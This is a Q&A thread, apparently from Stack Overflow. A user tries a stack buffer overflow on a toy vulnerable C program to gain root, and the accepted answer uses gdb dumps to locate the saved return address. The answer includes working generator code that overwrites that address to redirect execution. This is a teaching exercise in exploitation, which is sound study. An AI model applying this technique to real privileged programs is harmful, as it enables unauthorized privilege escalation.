# How to implement a buffer overflow

Tags: c, stack, memory-address, buffer-overflow

I am trying to use a buffer overflow to gain access to the root user     (purely for educational purposes)

I have written the following code to write the needed input to a bad file

```
int main(int argc, char **argv) {
    char buffer[512];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 512);

    /*First 20 characters for buffer*/
    strcpy(buffer, "a b c d e f g h i j ");

    /*Over write the next 8 characters*/
    strcat(buffer, "a b c d ");

    /*Overwrite return address*/
    strcat(buffer, argv[1]);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 512, 1, badfile);
    fclose(badfile);
}
```

And this is the code that should be executed by the program with root access

```
int bof(char *str){
    char buffer[20];

    /* The following allows buffer overflow */ 
    strcpy(buffer, str);

    return 1;
  }


int main(int argc, char **argv) {
    char str[BSIZE];
    FILE *badfile;
    char *badfname = "badfile";

    badfile = fopen(badfname, "r");
    fread(str, sizeof(char), BSIZE, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```

I want the input read from badfile to change the return address of bof so that it will instead return to code that I have also written into the bad file input. However I am just getting seg faults with my current code. I know that this means I am writing my new return address to the wrong part of memory but I am unsure how to find the correct place to write too.
I am running on a 32 bit Virtual Machine and have included the gdb disassemble of the second piece of code

```
Dump of assembler code for function main:
0x080484d6 <main+0>:    lea    0x4(%esp),%ecx
0x080484da <main+4>:    and    $0xfffffff0,%esp
0x080484dd <main+7>:    pushl  -0x4(%ecx)
0x080484e0 <main+10>:   push   %ebp
0x080484e1 <main+11>:   mov    %esp,%ebp
0x080484e3 <main+13>:   push   %ecx
0x080484e4 <main+14>:   sub    $0x224,%esp
0x080484ea <main+20>:   movl   $0x8048623,-0x8(%ebp)
0x080484f1 <main+27>:   movl   $0x804862b,0x4(%esp)
0x080484f9 <main+35>:   mov    -0x8(%ebp),%eax
0x080484fc <main+38>:   mov    %eax,(%esp)
0x080484ff <main+41>:   call   0x80483a0 <fopen@plt>
0x08048504 <main+46>:   mov    %eax,-0xc(%ebp)
0x08048507 <main+49>:   mov    -0xc(%ebp),%eax
0x0804850a <main+52>:   mov    %eax,0xc(%esp)
0x0804850e <main+56>:   movl   $0x200,0x8(%esp)
0x08048516 <main+64>:   movl   $0x1,0x4(%esp)
0x0804851e <main+72>:   lea    -0x20c(%ebp),%eax
0x08048524 <main+78>:   mov    %eax,(%esp)
0x08048527 <main+81>:   call   0x80483e0 <fread@plt>
0x0804852c <main+86>:   lea    -0x20c(%ebp),%eax
0x08048532 <main+92>:   mov    %eax,(%esp)
---Type <return> to continue, or q <return> to quit---
0x08048535 <main+95>:   call   0x80484a4 <bof>
0x0804853a <main+100>:  movl   $0x804862d,(%esp)
0x08048541 <main+107>:  call   0x80483d0 <puts@plt>
0x08048546 <main+112>:  mov    $0x1,%eax
0x0804854b <main+117>:  add    $0x224,%esp
0x08048551 <main+123>:  pop    %ecx
0x08048552 <main+124>:  pop    %ebp
0x08048553 <main+125>:  lea    -0x4(%ecx),%esp
0x08048556 <main+128>:  ret    
End of assembler dump.
(gdb) 
(gdb) disassemble bof
Dump of assembler code for function bof:
0x080484a4 <bof+0>: push   %ebp
0x080484a5 <bof+1>: mov    %esp,%ebp
0x080484a7 <bof+3>: sub    $0x28,%esp
0x080484aa <bof+6>: mov    0x8(%ebp),%eax
0x080484ad <bof+9>: mov    %eax,0x4(%esp)
0x080484b1 <bof+13>:    lea    -0x14(%ebp),%eax
0x080484b4 <bof+16>:    mov    %eax,(%esp)
0x080484b7 <bof+19>:    call   0x80483b0 <strcpy@plt>
0x080484bc <bof+24>:    lea    -0x14(%ebp),%eax
0x080484bf <bof+27>:    mov    %eax,0x4(%esp)
0x080484c3 <bof+31>:    movl   $0x8048620,(%esp)
0x080484ca <bof+38>:    call   0x80483c0 <printf@plt>
0x080484cf <bof+43>:    mov    $0x1,%eax
0x080484d4 <bof+48>:    leave  
0x080484d5 <bof+49>:    ret    
End of assembler dump.
```

Comment: take a look at this: http://stackoverflow.com/questions/31986411/how-to-disable-possible-stack-smashing-protection-eip-is-not-being-overwritten/31993717#31993717, if that doesn't help let me and I'll try to give more details.

Comment: I read through that but I didn't fully understand it. I have used very basic code to do this before `buffer[4];  int *ret;   ret = buffer + 12;  (*ret) = 0x1234abc;`

Comment: OK...I'll try and give a more complete answer when I get home tomorrow from work.

Answer (score 1, accepted):

1. disclaimer:

   I am using Window 7 with gcc-4.8.3 (from http://mingw-w64.org/doku.php), along with gdb version 7.8 (also from http://mingw-w64.org/doku.php).  Additionally, Windows 7 doesn't appear to have ASLR as when I run this small test program:

   ```
   #include <stdio.h>

   unsigned long find_start(void)
   {
       __asm__("movl %esp, %eax");
   }

   int main()
   {
       printf("0x%X\n", find_start();
       return (0);
   }
   ```

   I get the same memory locations, as shown below:

   ```
   Q:\>find_addr1
   0x28fea8
   Q:\>find_addr1
   0x28fea8
   Q:\>find_addr1
   0x28fea8
   ```

   This program is taken from "The Shellcoder's Handbook:Discovering and Exploiting Security Holes" by Chris Anley *et. al.*,  which comments: 
   "..if you notice that the address the program prints out is different each time, it probably means you're running a distribution with the grsecurity patch, or something similar."  If you do have different addresses, it will make reproducing the following more difficult.  For example, running on my Ubuntu-14.04 LTS system, I get the following:

   ```
   ubuntu:~/projects$ ./find_addr
   0x4F5AF640
   ubuntu:~/projects$ ./find_addr
   0xCE71D3B0
   ubuntu:~/projects$ ./find_addr
   0xD4A21710
   ```

OK, now that the preliminaries are out of the way, on to your example.  So using your code to generate 'badfile`, I created this file:

```
    Q:\SE_test>genFile 0x43434343
    Q:\SE_test>more badfile
    a b c d e f g h i j a b c d 0x43434343ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉ
    Q:\SE_test>
```

Now, let's run you vulnerable program under GDB, and stop right before the call to `bof`.  The disassembly at this point looks like this:

```
       0x004015db <+92>:    call   0x4027b8 <fread>
    => 0x004015e0 <+97>:    lea    0x18(%esp),%eax
       0x004015e4 <+101>:   mov    %eax,(%esp)
       0x004015e7 <+104>:   call   0x401560 <bof>
       0x004015ec <+109>:   movl   $0x40402e,(%esp)
```

At this point we can look at some values of interest.  First, note the address of the instruction after the call to `bof` (**0x004015ec**), we will need that later.  Secondly, we can examine some significant variables and registers:

```
    (gdb) print str
    $1 = "a b c d e f g h i j a b c d 0x43434343\000", '\220' <repeats 473 times>
    (gdb) print $ebp
    $2 = (void *) 0x28fec8
    (gdb) print $esp
    $3 = (void *) 0x28fca0
```

So, we now know in memory where the activation frame for `main` is found, as well as verifying that you have read the string in correctly.  Looking at the value of string, I do see two things that may cause problems later;

1. Notice the null terminator (\000) embedded in the string?  This will cause the string copy in `bof` to stop.  We still should get a buffer overflow.  Just something to be aware of in shell-code we can't have 0x00 bytes and expect to use string-processing functions.
2. Notice that address that I entered (0x43434343) shows up as text and not an address.  This is, from what I can tell, a consequence of using Windows; however we can still see where we are writing to memory and check if things are going in the correct place.

Now we can step into `bof` and see what we have:

```
     (gdb) s
     bof (str=0x28fcb8 "a b c d e f g h i j a b c d 0x43434343") at overflow1.c:13
     13     strcpy(buffer, str);
     (gdb) print $esp
     $5 = (void *) 0x28fc60
     (gdb) print $ebp
     $6 = (void *) 0x28fc98
     (gdb) x/80xb 0x28fc60
     0x28fc60:  0x00    0x02    0x00    0x00    0x50    0xfc    0x28    0x00
     0x28fc68:  0x60    0x29    0x76    0x76    0xc4    0xff    0x28    0x00
     0x28fc70:  0xd5    0x8c    0x6e    0x76    0xc7    0x1f    0xa9    0x74
     0x28fc78:  0xfe    0xff    0xff    0xff    0x6f    0xf4    0x6d    0x76
     0x28fc80:  0xe0    0xf3    0x6d    0x76    0xb8    0xfc    0x28    0x00
     0x28fc88:  0xff    0xff    0xff    0xff    0x01    0x00    0x00    0x00
     0x28fc90:  0x00    0x02    0x00    0x00    0x60    0x29    0x76    0x76
     0x28fc98:  0xc8    0xfe    0x28    0x00    0xec    0x15    0x40    0x00
     0x28fca0:  0xb8    0xfc    0x28    0x00    0x01    0x00    0x00    0x00
     0x28fca8:  0x00    0x02    0x00    0x00    0x60    0x29    0x76    0x76
```

At this point, we are starting to get a feeling for how memory is laid out, and we can look at the contents of the memory as well.  What is particularly interesting are the values located at memory locations **0x28fc9c** and **0x28fca0** which I have entered into the diagram below:

```
      address          contents      
                     +------------+
       0x28fec8      |            |   <-- base pointer for main's stack frame
                     +------------+
                     |            |
                     ~            ~ 
                     ~            ~
                     |            |
                     +------------+
      0x28fca0       | 0x0028fcb8 |   <-- stack pointer for main's stack frame
                     +------------+
      0x28fc9c       | 0x004015ec |   <--- stored eip
                     +------------+
      0x28fc98       | 0x0028fec8 |   <-- base pointer for bof's stack frame
                     +------------+
                     |            |
                     ~            ~ 
                     ~            ~
                     |            |
                     +------------+
      0x28fc60       |            |   <-- stack pointer for bof's stack frame
                     +------------+
```

Looking at the disassembly of main we can see that the next instruction after the call to `bof` is located at **0x004015ec**, which we can see has been pushed on the stack at memory location **0x0028fc9c**.

Now that this analysis is done, we can execute the string copy and then look at memory again and see what we've done (remembering that 'a' has an ASCII value of 0x61 and that space has an ASCII value of 0x20).  As a point of reference we can see that the buffer in `bof` is located at a memory address of 0x000x28fc7c

```
  (gdb) x/80xb 0x28fc60
  0x28fc60: 0x7c    0xfc    0x28    0x00    0xb8    0xfc    0x28    0x00
  0x28fc68: 0x60    0x29    0x76    0x76    0xc4    0xff    0x28    0x00
  0x28fc70: 0xd5    0x8c    0x6e    0x76    0xc7    0x1f    0xa9    0x74
  0x28fc78: 0xfe    0xff    0xff    0xff    0x61    0x20    0x62    0x20
  0x28fc80: 0x63    0x20    0x64    0x20    0x65    0x20    0x66    0x20
  0x28fc88: 0x67    0x20    0x68    0x20    0x69    0x20    0x6a    0x20
  0x28fc90: 0x61    0x20    0x62    0x20    0x63    0x20    0x64    0x20
  0x28fc98: 0x30    0x78    0x34    0x33    0x34    0x33    0x34    0x33
  0x28fca0: 0x34    0x33    0x00    0x00    0x01    0x00    0x00    0x00
  0x28fca8: 0x00    0x02    0x00    0x00    0x60    0x29    0x76    0x76
```

We are particularly interested in the region around where the stored *eip* is located at:

```
  0x28fca8:  0x00   0x02    0x00    0x00
  0x28fca4:  0x01   0x00    0x00    0x00
  0x28fca0:  0x34   0x33    0x00    0x00
  0x28fc9c:  0x34   0x33    0x34    0x33
  0x28fc98:  0x30   0x78    0x34    0x33
```

From this it looks like the first part of what I entered as a command line argument (0x43) is overwriting *ebp* for `bof`.  From this I would suspect that you need to add four more bytes into your string prior to writing out the new address.  Also, you probably need to check to make sure the your command line argument is being treated correctly.

As a test of this, I modified your two programs a bit to this:

First, the program to generate the bad file was modified to this:

```
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int main(int argc, char **argv)
  {
      char buffer[512];
      FILE *badfile;
      int  ndx;

      /* Initialize buffer with 0x90 (NOP instruction) */
      memset(buffer, 0x90, 512);

     /*First n-characters for buffer*/
     for(ndx = 0; ndx < atoi(argv[1]); ndx++)
         buffer[ndx] = 'A';

    /*Overwrite return address*/
    buffer[ndx++] = 0x7f;
    buffer[ndx++] = 0x15;
    buffer[ndx++] = 0x40;
    buffer[ndx++] = 0x00;

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 512, 1, badfile);
    fclose(badfile);
    return 0;
  }
```

Your command line argument now allows you to enter the number of bytes to write out to the file prior to writing your new return address.  I also modified your vulnerable program to look like this:

```
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  #define BSIZE 512

  int bof(char *str)
  {
       char buffer[20];

       /* The following allows buffer overflow */ 
       strcpy(buffer, str);

       return 1;
  }

  void output()
  {
       printf("We should never see this\n");
       exit(1);
  }

  int main(int argc, char **argv)
  {
      char str[BSIZE];
      FILE *badfile;
      char *badfname = "badfile";

      badfile = fopen(badfname, "r");
      fread(str, sizeof(char), BSIZE, badfile);
      bof(str);

      printf("Returned Properly\n");
      return 0;
  }
```

Notice that `output` is effectively dead-code, however doing a quick disassembly, I can find that `output` starts at **0x0040157f**.  This is the value that I entered into the buffer in the genFile code above.  Now
for a couple of test cases:

```
    Q:\SE_test>gcc -ansi -pedantic -Wall genFile.c -o genFile

    Q:\SE_test>gcc -ansi -pedantic -Wall overflow1.c -o overflow1

    Q:\SE_test>genFile 28

    Q:\SE_test>overflow1
    Returned Properly (see note below)

    Q:\SE_test>genFile 32

    Q:\SE_test>overflow1
    We should never see this

    Q:\SE_test>
```

Note: In the first run, even though the program displayed "Returned Properly",  the program did crash and windows displayed the "This program has stopped working dialog".

Hope this helps, if you have any other questions, please ask.
T.